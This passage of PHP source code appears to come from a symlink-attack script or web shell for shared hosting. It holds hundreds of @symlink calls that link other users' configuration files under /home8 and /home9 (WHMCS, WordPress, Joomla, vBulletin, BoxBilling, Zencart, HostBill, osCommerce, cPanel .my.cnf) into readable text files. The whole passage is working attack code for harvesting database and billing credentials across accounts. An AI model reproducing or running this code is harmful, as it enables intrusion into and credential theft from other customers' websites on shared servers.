  2288. @symlink('/home8/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2289. @symlink('/home8/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2290. @symlink('/home8/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2291. @symlink('/home8/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2292. @symlink('/home8/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2293. @symlink('/home8/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2294. @symlink('/home8/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2295. @symlink('/home8/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2296. @symlink('/home8/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2297. @symlink('/home8/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2298. @symlink('/home8/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2299. @symlink('/home8/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2300. @symlink('/home8/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2301. @symlink('/home8/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2302. @symlink('/home8/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2303. @symlink('/home8/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2304. @symlink('/home8/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2305. @symlink('/home8/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2306. @symlink('/home8/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2307. @symlink('/home8/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2308. @symlink('/home8/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2309. @symlink('/home8/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2310. @symlink('/home8/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2311. @symlink('/home8/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2312. @symlink('/home8/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2313. @symlink('/home8/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2314. @symlink('/home8/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2315. @symlink('/home8/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2316. @symlink('/home8/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2317. @symlink('/home8/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2318. @symlink('/home8/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2319. @symlink('/home8/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2320. @symlink('/home8/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2321. @symlink('/home8/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2322. @symlink('/home8/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2323. @symlink('/home8/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2324. @symlink('/home8/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2325. @symlink('/home8/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2326. @symlink('/home8/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2327. @symlink('/home8/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2328. @symlink('/home8/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2329. @symlink('/home8/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2330. @symlink('/home8/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2331. @symlink('/home8/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2332. @symlink('/home8/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2333. @symlink('/home8/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2334. @symlink('/home8/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2335. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2336. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2337. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2338. @symlink('/home8/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2339. @symlink('/home8/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2340. @symlink('/home8/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2341. @symlink('/home8/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2342. @symlink('/home8/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2343. @symlink('/home8/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2344. @symlink('/home8/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2345. @symlink('/home8/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2346. @symlink('/home8/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2347. @symlink('/home8/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2348. @symlink('/home8/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2349. @symlink('/home8/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2350. @symlink('/home8/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2351. @symlink('/home8/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2352. @symlink('/home8/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2353. @symlink('/home8/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2354. @symlink('/home8/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2355. @symlink('/home8/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2356. @symlink('/home8/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2357. @symlink('/home8/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2358. @symlink('/home8/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2359. @symlink('/home8/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2360. @symlink('/home8/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2361. @symlink('/home8/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2362. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2363. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2364. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2365. @symlink('/home8/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2366. @symlink('/home8/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2367. @symlink('/home8/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2368. @symlink('/home8/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2369. @symlink('/home8/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2370. @symlink('/home8/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2371. @symlink('/home8/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2372. @symlink('/home8/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2373. @symlink('/home8/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2374. @symlink('/home8/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2375. @symlink('/home8/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2376. @symlink('/home8/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2377. @symlink('/home8/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2378. @symlink('/home8/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2379. @symlink('/home8/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2380. @symlink('/home8/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2381. @symlink('/home8/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2382. @symlink('/home8/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2383. @symlink('/home8/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2384. @symlink('/home8/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2385. @symlink('/home8/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2386. @symlink('/home8/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2387. @symlink('/home8/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2388. @symlink('/home8/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2389. @symlink('/home8/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2390. @symlink('/home8/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2391. @symlink('/home8/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2392. @symlink('/home8/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2393. @symlink('/home8/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2394. @symlink('/home8/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2395. @symlink('/home8/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2396. @symlink('/home8/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2397. @symlink('/home8/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2398. @symlink('/home8/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2399. @symlink('/home8/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2400. @symlink('/home8/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2401. @symlink('/home8/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2402. @symlink('/home8/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2403. @symlink('/home8/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2404. @symlink('/home8/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2405. @symlink('/home8/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2406. @symlink('/home8/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2407. @symlink('/home8/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2408. @symlink('/home8/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2409. @symlink('/home8/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2410. @symlink('/home8/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2411. @symlink('/home8/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2412. @symlink('/home8/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2413. @symlink('/home8/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2414. @symlink('/home8/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2415. @symlink('/home8/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2416. @symlink('/home8/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2417. @symlink('/home8/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2418.  
  2419. //home 9
  2420.  
  2421. @symlink('/home9/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2422. @symlink('/home9/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2423. @symlink('/home9/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2424. @symlink('/home9/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2425. @symlink('/home9/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2426. @symlink('/home9/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2427. @symlink('/home9/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2428. @symlink('/home9/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2429. @symlink('/home9/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2430. @symlink('/home9/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2431. @symlink('/home9/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2432. @symlink('/home9/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2433. @symlink('/home9/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2434. @symlink('/home9/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2435. @symlink('/home9/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2436. @symlink('/home9/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2437. @symlink('/home9/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2438. @symlink('/home9/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2439. @symlink('/home9/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2440. @symlink('/home9/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2441. @symlink('/home9/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2442. @symlink('/home9/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2443. @symlink('/home9/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2444. @symlink('/home9/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2445. @symlink('/home9/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2446. @symlink('/home9/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2447. @symlink('/home9/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2448. @symlink('/home9/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2449. @symlink('/home9/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2450. @symlink('/home9/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2451. @symlink('/home9/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2452. @symlink('/home9/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2453. @symlink('/home9/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2454. @symlink('/home9/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2455. @symlink('/home9/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2456. @symlink('/home9/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2457. @symlink('/home9/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2458. @symlink('/home9/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2459. @symlink('/home9/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2460. @symlink('/home9/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2461. @symlink('/home9/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2462. @symlink('/home9/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2463. @symlink('/home9/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2464. @symlink('/home9/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2465. @symlink('/home9/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2466. @symlink('/home9/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2467. @symlink('/home9/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2468. @symlink('/home9/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2469. @symlink('/home9/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2470. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2471. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2472. @symlink('/home9/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2473. @symlink('/home9/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2474. @symlink('/home9/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2475. @symlink('/home9/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2476. @symlink('/home9/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2477. @symlink('/home9/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2478. @symlink('/home9/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2479. @symlink('/home9/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2480. @symlink('/home9/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2481. @symlink('/home9/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2482. @symlink('/home9/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2483. @symlink('/home9/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2484. @symlink('/home9/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2485. @symlink('/home9/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2486. @symlink('/home9/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2487. @symlink('/home9/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2488. @symlink('/home9/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2489. @symlink('/home9/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2490. @symlink('/home9/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2491. @symlink('/home9/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2492. @symlink('/home9/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2493. @symlink('/home9/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2494. @symlink('/home9/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2495. @symlink('/home9/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2496. @symlink('/home9/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2497. @symlink('/home9/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2498. @symlink('/home9/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2499. @symlink('/home9/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2500. @symlink('/home9/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2501. @symlink('/home9/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2502. @symlink('/home9/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2503. @symlink('/home9/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2504. @symlink('/home9/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2505. @symlink('/home9/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2506. @symlink('/home9/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2507. @symlink('/home9/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2508. @symlink('/home9/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2509. @symlink('/home9/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2510. @symlink('/home9/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2511. @symlink('/home9/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2512. @symlink('/home9/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2513. @symlink('/home9/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2514. @symlink('/home9/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2515. @symlink('/home9/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2516. @symlink('/home9/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2517. @symlink('/home9/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2518. @symlink('/home9/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2519. @symlink('/home9/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2520. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2521. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2522. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2523. @symlink('/home9/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2524. @symlink('/home9/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2525. @symlink('/home9/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2526. @symlink('/home9/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2527. @symlink('/home9/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2528. @symlink('/home9/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2529. @symlink('/home9/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2530. @symlink('/home9/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2531. @symlink('/home9/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2532. @symlink('/home9/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2533. @symlink('/home9/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2534. @symlink('/home9/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2535. @symlink('/home9/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2536. @symlink('/home9/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2537. @symlink('/home9/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2538. @symlink('/home9/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2539. @symlink('/home9/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2540. @symlink('/home9/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2541. @symlink('/home9/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2542. @symlink('/home9/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2543. @symlink('/home9/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2544. @symlink('/home9/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2545. @symlink('/home9/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2546. @symlink('/home9/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2547. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2548. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2549. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2550. @symlink('/home9/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2551. @symlink('/home9/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2552. @symlink('/home9/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2553. @symlink('/home9/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2554. @symlink('/home9/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2555. @symlink('/home9/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2556. @symlink('/home9/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2557. @symlink('/home9/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2558. @symlink('/home9/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2559. @symlink('/home9/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2560. @symlink('/home9/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2561. @symlink('/home9/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2562. @symlink('/home9/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2563. @symlink('/home9/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2564. @symlink('/home9/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2565. @symlink('/home9/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2566. @symlink('/home9/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2567. @symlink('/home9/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2568. @symlink('/home9/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2569. @symlink('/home9/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2570. @symlink('/home9/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2571. @symlink('/home9/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2572. @symlink('/home9/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2573. @symlink('/home9/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2574. @symlink('/home9/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2575. @symlink('/home9/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2576. @symlink('/home9/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2577. @symlink('/home9/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2578. @symlink('/home9/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2579. @symlink('/home9/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2580. @symlink('/home9/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2581. @symlink('/home9/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2582. @symlink('/home9/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2583. @symlink('/home9/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2584. @symlink('/home9/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2585. @symlink('/home9/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2586. @symlink('/home9/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2587. @symlink('/home9/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2588. @symlink('/home9/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2589. @symlink('/home9/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2590. @symlink('/home9/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2591. @symlink('/home9/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2592. @symlink('/home9/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
